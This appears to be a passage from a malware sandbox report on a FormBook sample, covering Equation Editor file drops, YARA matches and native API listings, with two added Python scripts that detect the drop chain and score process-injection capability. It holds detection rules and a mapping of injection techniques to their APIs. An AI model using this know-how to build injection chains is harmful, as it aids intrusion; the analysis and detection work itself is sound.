Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\vbc.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
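The two file-creation events above are the endpoint-visible signal of this stage: the Equation Editor host (EQNEDT32.EXE) writes an executable into the WinINet cache (Content.IE5, which means it fetched the file over HTTP) and then into C:\Users\Public. The following is an added detection example, not part of the sandbox report. The event records are constructed to mirror the report's paths rather than taken from real telemetry; the dict fields follow the Sysmon ProcessCreate (Event ID 1) and FileCreate (Event ID 11) schema, and the rule names are the author's own. The process-spawn rule goes slightly beyond the two lines above, since a child process of EQNEDT32.EXE is the same exploitation chain one step later.

```python
"""Detect Microsoft Equation Editor (EQNEDT32.EXE) writing executables or
spawning child processes.

Added example, not part of the sandbox report. SAMPLE_EVENTS is constructed
to mirror the report's dropped-file paths; it is not real telemetry. Field
names follow Sysmon Event ID 1 (ProcessCreate) and Event ID 11 (FileCreate).
"""
import ntpath

EQUATION_EDITOR = "eqnedt32.exe"
# Extensions an equation-rendering host has no legitimate reason to write.
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".com", ".pif", ".cpl"}
# The WinINet cache: a file landing here was fetched over HTTP by the
# writing process (URLDownloadToFile / WinINet), not carved from the document.
WININET_CACHE = "\\content.ie5\\"


def _image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def check_event(ev: dict) -> list[str]:
    """Return the names of the rules the event matches (empty if benign)."""
    hits: list[str] = []
    eid = ev["EventID"]
    if eid == 11 and _image_name(ev["Image"]) == EQUATION_EDITOR:
        target = ev["TargetFilename"]
        if ntpath.splitext(target)[1].lower() in EXECUTABLE_EXTS:
            hits.append("eqnedt32_drops_pe")
        if WININET_CACHE in target.lower():
            hits.append("eqnedt32_downloads_file")
    elif eid == 1 and _image_name(ev["ParentImage"]) == EQUATION_EDITOR:
        # Equation Editor renders OLE objects; a child process of it is the
        # exploit payload running.
        hits.append("eqnedt32_spawns_process")
    return hits


def scan(events: list[dict]) -> dict[str, list[str]]:
    """Map each triggered rule to the artifacts (paths) that triggered it."""
    findings: dict[str, list[str]] = {}
    for ev in events:
        artifact = ev.get("TargetFilename") or ev.get("Image", "")
        for rule in check_event(ev):
            findings.setdefault(rule, []).append(artifact)
    return findings


# Constructed sample telemetry, modelled on the report's paths.
SAMPLE_EVENTS = [
    {"EventID": 11,
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe"},
    {"EventID": 11,
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1,
     "Image": r"C:\Users\Public\vbc.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    # Benign control: Excel writing its own temporary file.
    {"EventID": 11,
     "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\~DF1234.tmp"},
]

if __name__ == "__main__":
    for rule, artifacts in scan(SAMPLE_EVENTS).items():
        print(rule, "->", ", ".join(artifacts))
```

The rules deliberately key on the image name rather than the full path, because the Equation Editor binary lives under both Program Files and Program Files (x86) depending on Office bitness; anything more specific than that only adds evasion surface.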
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_004181B0 NtCreateFile, 7_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418260 NtReadFile, 7_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182E0 NtClose, 7_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418390 NtAllocateVirtualMemory, 7_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418392 NtAllocateVirtualMemory, 7_2_00418392
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk, 7_2_00B300C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30078 NtResumeThread,LdrInitializeThunk, 7_2_00B30078
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_00B30048
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B307AC NtCreateMutant,LdrInitializeThunk, 7_2_00B307AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F9F0 NtClose,LdrInitializeThunk, 7_2_00B2F9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F900 NtReadFile,LdrInitializeThunk, 7_2_00B2F900
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_00B2FAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_00B2FAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_00B2FBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_00B2FB68
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_00B2FC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_00B2FC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FD8C NtDelayExecution,LdrInitializeThunk, 7_2_00B2FD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_00B2FDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_00B2FEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_00B2FED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk, 7_2_00B2FFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B310D0 NtOpenProcessToken, 7_2_00B310D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30060 NtQuerySection, 7_2_00B30060
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B301D4 NtSetValueKey, 7_2_00B301D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3010C NtOpenDirectoryObject, 7_2_00B3010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31148 NtOpenThread, 7_2_00B31148
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F8CC NtWaitForSingleObject, 7_2_00B2F8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31930 NtSetContextThread, 7_2_00B31930
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F938 NtWriteFile, 7_2_00B2F938
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FAB8 NtQueryValueKey, 7_2_00B2FAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FA20 NtQueryInformationFile, 7_2_00B2FA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FA50 NtEnumerateValueKey, 7_2_00B2FA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FBE8 NtQueryVirtualMemory, 7_2_00B2FBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FB50 NtCreateKey, 7_2_00B2FB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC30 NtOpenProcess, 7_2_00B2FC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30C40 NtGetContextThread, 7_2_00B30C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC48 NtSetInformationFile, 7_2_00B2FC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31D80 NtSuspendThread, 7_2_00B31D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FD5C NtEnumerateKey, 7_2_00B2FD5C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FE24 NtWriteVirtualMemory, 7_2_00B2FE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FFFC NtCreateProcessEx, 7_2_00B2FFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FF34 NtQueueApcThread, 7_2_00B2FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF00C4 NtCreateFile,LdrInitializeThunk, 9_2_01FF00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF07AC NtCreateMutant,LdrInitializeThunk, 9_2_01FF07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF9F0 NtClose,LdrInitializeThunk, 9_2_01FEF9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF900 NtReadFile,LdrInitializeThunk, 9_2_01FEF900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_01FEFBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_01FEFB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFB50 NtCreateKey,LdrInitializeThunk, 9_2_01FEFB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_01FEFAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_01FEFAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_01FEFAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_01FEFDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFD8C NtDelayExecution,LdrInitializeThunk, 9_2_01FEFD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_01FEFC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFFB4 NtCreateSection,LdrInitializeThunk, 9_2_01FEFFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_01FEFED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF01D4 NtSetValueKey, 9_2_01FF01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1148 NtOpenThread, 9_2_01FF1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF010C NtOpenDirectoryObject, 9_2_01FF010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF10D0 NtOpenProcessToken, 9_2_01FF10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0078 NtResumeThread, 9_2_01FF0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0060 NtQuerySection, 9_2_01FF0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0048 NtProtectVirtualMemory, 9_2_01FF0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF938 NtWriteFile, 9_2_01FEF938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1930 NtSetContextThread, 9_2_01FF1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF8CC NtWaitForSingleObject, 9_2_01FEF8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFBE8 NtQueryVirtualMemory, 9_2_01FEFBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFA50 NtEnumerateValueKey, 9_2_01FEFA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFA20 NtQueryInformationFile, 9_2_01FEFA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1D80 NtSuspendThread, 9_2_01FF1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFD5C NtEnumerateKey, 9_2_01FEFD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC90 NtUnmapViewOfSection, 9_2_01FEFC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC48 NtSetInformationFile, 9_2_01FEFC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0C40 NtGetContextThread, 9_2_01FF0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC30 NtOpenProcess, 9_2_01FEFC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFFFC NtCreateProcessEx, 9_2_01FEFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFF34 NtQueueApcThread, 9_2_01FEFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFEA0 NtReadVirtualMemory, 9_2_01FEFEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFE24 NtWriteVirtualMemory, 9_2_01FEFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_000981B0 NtCreateFile, 9_2_000981B0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00098260 NtReadFile, 9_2_00098260
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_000982E0 NtClose, 9_2_000982E0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00098390 NtAllocateVirtualMemory, 9_2_00098390
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00098392 NtAllocateVirtualMemory, 9_2_00098392
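Two things in the native-function list above are worth pulling out mechanically. First, the Nt* set resolved by vbc.exe (process 7) contains every building block of process hollowing (NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) and of APC injection (NtQueueApcThread). Second, the same stubs reappear in NAPSTAT.EXE (process 9) at addresses that differ from the vbc.exe ones by a constant (0x00B2FC90 vs 0x01FEFC90 for NtUnmapViewOfSection, 0x004181B0 vs 0x000981B0 for NtCreateFile, and so on), which is what copied-and-relocated code looks like, not a DLL loaded by the loader. The script below is an added example, not part of the report: it parses the report's own Code-function lines (a subset is embedded inline, plus one constructed benign control line), scores each process against textbook injection API sets, and groups shared APIs by address delta. The technique API sets are the usual ones from the literature, not something the report states, and a full set means the capability is present, not that it was exercised.

```python
"""Triage the 'Contains functionality to call native functions' block of a
sandbox report: which injection primitives does each process resolve, and
does the same code show up relocated inside a second process?

Added example, not part of the report. REPORT_LINES embeds a subset of the
report's own lines plus one constructed control line (notepad.exe).
"""
import re
from collections import defaultdict

# Matches the report's "Source: <image> Code function: P_R_ADDR api,api, P_R_ADDR"
# lines; P and R are the process and phase indices used in the N_M_ prefix.
LINE_RE = re.compile(
    r"^Source: (?P<image>.+?) Code function: "
    r"(?P<proc>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]+) "
    r"(?P<apis>[A-Za-z0-9_,]+), \d+_\d+_[0-9A-Fa-f]+$"
)

# Minimal Nt* API sets per technique (assumed textbook sets, not from the report).
TECHNIQUES = {
    "process_hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "apc_injection": {"NtQueueApcThread", "NtWriteVirtualMemory", "NtResumeThread"},
    "section_mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "thread_hijack": {"NtSuspendThread", "NtGetContextThread",
                      "NtSetContextThread", "NtResumeThread"},
}


def parse(lines):
    """Return {(proc_index, image): {api_name: [addr, ...]}} for Nt* APIs."""
    out = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        key = (int(m["proc"]), m["image"])
        addr = int(m["addr"], 16)
        for api in filter(None, m["apis"].split(",")):
            if api.startswith("Nt"):            # drop LdrInitializeThunk etc.
                out[key][api].append(addr)
    return out


def score(apis):
    """Fraction of each technique's API set that the process resolves."""
    present = set(apis)
    return {name: len(need & present) / len(need) for name, need in TECHNIQUES.items()}


def relocation_deltas(a, b):
    """Group APIs common to two processes by (addr_in_b - addr_in_a).

    One delta covering many APIs means the same code was copied into the
    second process at a different base, i.e. injected rather than loaded.
    Deltas seen only once are dropped as cross-pairing noise.
    """
    deltas = defaultdict(list)
    for api in set(a) & set(b):
        for addr_a in a[api]:
            for addr_b in b[api]:
                deltas[addr_b - addr_a].append(api)
    return {d: sorted(v) for d, v in deltas.items() if len(v) > 1}


REPORT_LINES = [
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_004181B0 NtCreateFile, 7_2_004181B0",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00418260 NtReadFile, 7_2_00418260",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk, 7_2_00B300C4",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30078 NtResumeThread,LdrInitializeThunk, 7_2_00B30078",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_00B2FC90",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_00B2FC60",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk, 7_2_00B2FFB4",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31930 NtSetContextThread, 7_2_00B31930",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30C40 NtGetContextThread, 7_2_00B30C40",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31D80 NtSuspendThread, 7_2_00B31D80",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FE24 NtWriteVirtualMemory, 7_2_00B2FE24",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FFFC NtCreateProcessEx, 7_2_00B2FFFC",
    r"Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FF34 NtQueueApcThread, 7_2_00B2FF34",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF00C4 NtCreateFile,LdrInitializeThunk, 9_2_01FF00C4",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_01FEFC60",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFFB4 NtCreateSection,LdrInitializeThunk, 9_2_01FEFFB4",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0078 NtResumeThread, 9_2_01FF0078",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1930 NtSetContextThread, 9_2_01FF1930",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1D80 NtSuspendThread, 9_2_01FF1D80",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC90 NtUnmapViewOfSection, 9_2_01FEFC90",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0C40 NtGetContextThread, 9_2_01FF0C40",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFFFC NtCreateProcessEx, 9_2_01FEFFFC",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFF34 NtQueueApcThread, 9_2_01FEFF34",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFE24 NtWriteVirtualMemory, 9_2_01FEFE24",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_000981B0 NtCreateFile, 9_2_000981B0",
    r"Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00098260 NtReadFile, 9_2_00098260",
    # Constructed control line, not from the report: a process that only closes handles.
    r"Source: C:\Windows\System32\notepad.exe Code function: 12_2_00401000 NtClose, 12_2_00401000",
]

if __name__ == "__main__":
    procs = parse(REPORT_LINES)
    for (idx, image), apis in procs.items():
        print(idx, image, score(apis))
    vbc = procs[(7, r"C:\Users\Public\vbc.exe")]
    nap = procs[(9, r"C:\Windows\SysWOW64\NAPSTAT.EXE")]
    for delta, names in relocation_deltas(vbc, nap).items():
        print(f"delta {delta:#x}: {len(names)} shared Nt* stubs")
```

On the embedded subset this yields two deltas: 0x14C0000 for the 0x00B3xxxx block (the stubs that also reach LdrInitializeThunk) and -0x380000 for the 0x0041xxxx block, i.e. two distinct code regions of vbc.exe that both reappear inside NAPSTAT.EXE at new bases. That is the static counterpart of the report's hollowing and thread-injection signatures.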
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_003913BC 4_2_003913BC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039D8BB 4_2_0039D8BB
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039D2CF 4_2_0039D2CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00391344 4_2_00391344
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039CBD0 4_2_0039CBD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00471BF4 4_2_00471BF4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00471C5A 4_2_00471C5A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004719E7 4_2_004719E7
Source: C:\Users\Public\vbc.exe Code function: 4_2_004715BF 4_2_004715BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E0448 4_2_007E0448
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E4418 4_2_007E4418
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E65E0 4_2_007E65E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E66F8 4_2_007E66F8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E5755 4_2_007E5755
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E38B0 4_2_007E38B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E4CC9 4_2_007E4CC9
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8DD9 4_2_007E8DD9
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E80E0 4_2_007E80E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E80D0 4_2_007E80D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E5170 4_2_007E5170
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E83D8 4_2_007E83D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E0438 4_2_007E0438
Source: C:\Users\Public\vbc.exe Code function: 4_2_007ED428 4_2_007ED428
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E64FC 4_2_007E64FC
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E7548 4_2_007E7548
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E7538 4_2_007E7538
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E6663 4_2_007E6663
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E66C8 4_2_007E66C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8770 4_2_007E8770
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8760 4_2_007E8760
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E4701 4_2_007E4701
